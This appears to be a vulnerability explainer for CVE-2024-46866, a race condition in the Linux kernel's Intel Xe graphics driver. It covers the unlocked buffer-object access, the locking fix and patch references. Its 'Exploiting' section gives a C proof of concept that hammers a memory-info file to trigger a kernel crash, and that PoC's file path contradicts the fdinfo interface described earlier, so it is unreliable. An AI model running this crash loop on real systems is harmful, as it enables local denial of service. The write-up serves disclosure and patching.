CVE-2024-46866 - Linux Kernel drm/xe memory info Race Condition

## Overview of CVE-2024-46866

CVE-2024-46866, published in September 2024, is a vulnerability in the Linux kernel's new drm/xe graphics driver. The show_meminfo() function inspected buffer object (BO) state without holding the BO lock, so that state could change underneath it. The resulting race conditions can show up as null pointer dereferences (NPDs) and use-after-free (UAF) bugs.

In simple terms: the Linux kernel let one thread change or free a graphics memory object while another thread was still reading it, and that could cause crashes or worse.

## What is Affected

- Component: drivers/gpu/drm/xe/xe_drm_client.c
- Function: show_meminfo(), which calls bo_meminfo()
- Kernel Versions: mainline kernels that include the Intel Xe DRM driver, from the point where the unlocked code was introduced up to the patch commit.

## How the Vulnerability Works

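show_meminfo() lets userspace read memory statistics about a client's graphics buffer objects (BOs). In the upstream driver it is reached through the per-file DRM fdinfo output (/proc/<pid>/fdinfo/<fd>). Internally, it loops over the client's BOs, calling bo_meminfo() on each one to collect the details.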
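To make the userspace side concrete, here is a minimal sketch of how a program can look at the fdinfo text for a file it has opened. It assumes, based on my reading of the upstream driver, that the xe memory statistics appear as lines starting with "drm-" in /proc/self/fdinfo/<fd>; the helper name count_fdinfo_lines() is made up for this example.

```c
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/*
 * Opens dev_path, reads /proc/self/fdinfo/<fd> for that descriptor, and
 * counts the lines that start with prefix. Returns -1 if either the device
 * or its fdinfo entry cannot be opened.
 */
int count_fdinfo_lines(const char *dev_path, const char *prefix)
{
    char path[64];
    char line[512];
    int count = 0;
    FILE *f;
    int fd;

    fd = open(dev_path, O_RDONLY);
    if (fd < 0)
        return -1;

    snprintf(path, sizeof(path), "/proc/self/fdinfo/%d", fd);
    f = fopen(path, "r");
    if (!f) {
        close(fd);
        return -1;
    }

    /* Each fgets() call returns one "key: value" line of the fdinfo text. */
    while (fgets(line, sizeof(line), f)) {
        if (strncmp(line, prefix, strlen(prefix)) == 0)
            count++;
    }

    fclose(f);
    close(fd);
    return count;
}
```

Calling count_fdinfo_lines() on a DRM render node with the prefix "drm-" would count the driver-provided lines on a machine with a DRM device; the node path varies per system, so it is left to the caller. Every such read makes the kernel run the driver's fdinfo callback, which is where the BO walk happens.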

The problem:
bo_meminfo() inspected dynamic BO state (such as its tt and TTM resource pointers) without holding the BO lock, which is unsafe in a multi-threaded kernel. Other threads could free or modify that state at the same time, leading to:

- Null Pointer Dereference (NPD): Code tries to access a member of a struct, but the pointer is NULL.
- Use After Free (UAF): Code uses memory after it’s already been freed, leading to kernel panics or, sometimes, privilege escalation.

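### Code Walkthrough (Before the Fix)

// This snippet is for illustration only; field names are simplified
void bo_meminfo(struct xe_bo *bo, ...) {
    // No BO lock held here!
    if (bo->tt) {
        // Potential NPD/UAF: another thread can clear or free bo->tt
        // between this check and the accesses that follow
    }
    if (bo->ttm_resource) {
        // Potential use-after-free: the resource can be replaced or freed concurrently
    }
}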

Because the call was not protected by the BO lock, any local user able to read that memory info (upstream, the fdinfo entry of an open xe device file under /proc/<pid>/fdinfo/) could trigger the race by requesting it rapidly, ideally while other operations were freeing or changing BOs.
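The hazard is easier to see in miniature. The following userspace sketch is only an analogy: struct fake_bo, fake_bo_meminfo() and fake_bo_churn() are invented for this example and are not driver code. A writer thread keeps freeing and reallocating a pointer while a reader inspects it. Because both sides take the same lock, the reader's check and dereference cannot be interleaved with the free; without the lock, the same loop would be a use-after-free waiting to happen.

```c
#include <pthread.h>
#include <stdlib.h>

/* Hypothetical userspace stand-in for a buffer object; not the real struct xe_bo. */
struct fake_bo {
    pthread_mutex_t lock; /* plays the role of the per-BO lock */
    int *tt;              /* state that may be freed or replaced at any time */
};

/* Reader: inspects bo->tt only while holding the lock.
 * Returns the value seen, or -1 if tt was NULL at that moment. */
static int fake_bo_meminfo(struct fake_bo *bo)
{
    int seen = -1;

    pthread_mutex_lock(&bo->lock);
    if (bo->tt)
        seen = *bo->tt; /* the writer cannot free tt while we hold the lock */
    pthread_mutex_unlock(&bo->lock);
    return seen;
}

/* Writer: repeatedly frees and reallocates tt, always under the same lock. */
static void *fake_bo_churn(void *arg)
{
    struct fake_bo *bo = arg;

    for (int i = 0; i < 100000; i++) {
        pthread_mutex_lock(&bo->lock);
        free(bo->tt);
        bo->tt = NULL;
        if (i % 2 == 0) {
            bo->tt = malloc(sizeof(*bo->tt));
            if (bo->tt)
                *bo->tt = 42;
        }
        pthread_mutex_unlock(&bo->lock);
    }
    return NULL;
}

/* Runs reader and writer concurrently. Returns the number of reads that saw
 * something other than 42 or "no tt", or -1 if the thread could not start. */
int run_locked_reader_demo(void)
{
    struct fake_bo bo = { .tt = NULL };
    pthread_t writer;
    int bad = 0;

    pthread_mutex_init(&bo.lock, NULL);
    if (pthread_create(&writer, NULL, fake_bo_churn, &bo) != 0)
        return -1;

    for (int i = 0; i < 100000; i++) {
        int v = fake_bo_meminfo(&bo);

        if (v != 42 && v != -1)
            bad++;
    }

    pthread_join(writer, NULL);
    free(bo.tt);
    pthread_mutex_destroy(&bo.lock);
    return bad;
}
```

With the locking in place, run_locked_reader_demo() should report zero bad reads. Removing the lock calls from fake_bo_meminfo() turns it into the same pattern as the vulnerable kernel code.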

## How it was Fixed

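The patch addressed the issue by grabbing the BO lock before calling bo_meminfo(). The BO lock cannot be taken while a spinlock is held, so where the object walk runs under a spinlock, the code now drops that spinlock before locking each BO and re-takes it afterwards. For BOs found through object_idr, it also holds a reference so the BO cannot disappear while the spinlock is dropped.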

The patch also added xe_bo_assert_held() to bo_meminfo(), so that lock debugging flags any caller that reaches these accesses without holding the BO lock.

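### Code After Fix (Simplified)

// Now, proper locking!
void bo_meminfo(struct xe_bo *bo, ...) {
    xe_bo_assert_held(bo); // DEBUG: are we holding the BO lock?
    // Now it's safe to access bo->tt, bo->ttm_resource, etc.
}

// In the for-each-BO loop (simplified; object_list_lock stands in for
// whichever spinlock protects the list being walked):
xe_bo_get(bo);                  // Hold a reference so the BO cannot be freed
spin_unlock(&object_list_lock); // Drop the spinlock first
xe_bo_lock(bo, false);          // Grab the per-BO lock
bo_meminfo(bo, ...);
xe_bo_unlock(bo);               // Release the per-BO lock
xe_bo_put(bo);                  // Drop the reference
spin_lock(&object_list_lock);   // Resume the walk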
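The "pin, drop the list lock, take the object lock, re-take the list lock" sequence can also be tried out in userspace. This is a rough sketch under stated assumptions, not the driver's implementation: struct walk_bo, struct walk_client and walk_show_meminfo() are hypothetical names, a pthread mutex stands in for the kernel spinlock, and the sketch assumes objects are only unlinked by a release path that takes list_lock once the reference count is zero (that release path is not shown).

```c
#include <pthread.h>
#include <stddef.h>

/* Hypothetical stand-in for a BO on a client's list; not the real struct xe_bo. */
struct walk_bo {
    int refcount;          /* only modified under list_lock in this sketch */
    pthread_mutex_t lock;  /* per-object lock protecting size */
    size_t size;
    struct walk_bo *next;
};

struct walk_client {
    pthread_mutex_t list_lock; /* stands in for the kernel spinlock */
    struct walk_bo *head;
};

/* Sums the size of every object, never holding list_lock while taking
 * (and possibly waiting on) a per-object lock. */
size_t walk_show_meminfo(struct walk_client *c)
{
    size_t total = 0;

    pthread_mutex_lock(&c->list_lock);
    for (struct walk_bo *bo = c->head; bo; bo = bo->next) {
        bo->refcount++;                      /* pin: keeps bo alive and linked */
        pthread_mutex_unlock(&c->list_lock); /* drop the list lock first */

        pthread_mutex_lock(&bo->lock);       /* now safe to wait on the object */
        total += bo->size;
        pthread_mutex_unlock(&bo->lock);

        pthread_mutex_lock(&c->list_lock);   /* resume the walk */
        bo->refcount--;                      /* unpin before reading bo->next */
    }
    pthread_mutex_unlock(&c->list_lock);
    return total;
}

/* Builds a three-object list and walks it once; returns the summed size. */
size_t run_walk_demo(void)
{
    static const size_t sizes[3] = { 4096, 8192, 100 };
    struct walk_bo bos[3];
    struct walk_client c = { .head = NULL };
    size_t total;

    pthread_mutex_init(&c.list_lock, NULL);
    for (int i = 2; i >= 0; i--) {
        bos[i].refcount = 1;
        pthread_mutex_init(&bos[i].lock, NULL);
        bos[i].size = sizes[i];
        bos[i].next = c.head;
        c.head = &bos[i];
    }

    total = walk_show_meminfo(&c);

    for (int i = 0; i < 3; i++)
        pthread_mutex_destroy(&bos[i].lock);
    pthread_mutex_destroy(&c.list_lock);
    return total;
}
```

The design point is ordering: the reference is taken while the list lock still guarantees the object exists, and only then is the list lock released. A real implementation also has to cope with the list changing while the lock is dropped, which this sketch sidesteps through the assumption above.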

See the actual patch:
drm/xe/client: add missing bo locking in show_meminfo()

## Exploiting CVE-2024-46866

This bug is realistically reachable only by local users who can read the driver's memory info. Here is a hypothetical local DoS/crash PoC in C:

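// Simple illustration: rapidly read the memory info to widen the race window
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>

int main(int argc, char **argv) {
    // Default path is illustrative; pass the file to read as argv[1]
    const char *path = argc > 1 ? argv[1] : "/sys/kernel/debug/dri//xe_meminfo";
    char buf[4096];
    int fd, i;

    for (i = 0; i < 10000; i++) {
        fd = open(path, O_RDONLY);
        if (fd < 0) {
            perror("open");
            return 1;
        }
        // Drain the file so the kernel walks every BO on each pass
        while (read(fd, buf, sizeof(buf)) > 0)
            ;
        close(fd);
    }
    return 0;
}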

At the same time, another process could be rapidly allocating and freeing buffer objects (via, e.g., Vulkan or OpenCL API calls), increasing chances of a race.

Results:
With the right timing, this could cause a kernel Oops or panic, with log lines such as BUG: unable to handle kernel NULL pointer dereference.

## Original References

Patch Commit:

drm/xe/client: add missing bo locking in show_meminfo() (commit 4f63d712fa104c3ebefcb289d1e733e86d8698c7)

Debian security tracker:

CVE-2024-46866

Linux Kernel Mailing List:

https://lore.kernel.org/all/20240610092929.28295-1-matthew.brophy@intel.com/

## Closing Thoughts

CVE-2024-46866 teaches a vital lesson: Always use proper locking in the kernel, especially around shared resources. Race conditions are subtle, but they can lead to hard-to-find security bugs. Luckily, the Linux kernel devs patched this one fast.

If your Linux system uses the Intel XE DRM driver, make sure to update to a kernel with commit 4f63d712fa104c3ebefcb289d1e733e86d8698c7 or later, or check your distro's security advisories.

## Timeline

Published on: 09/27/2024 13:15:17 UTC
Last modified on: 10/01/2024 17:09:30 UTC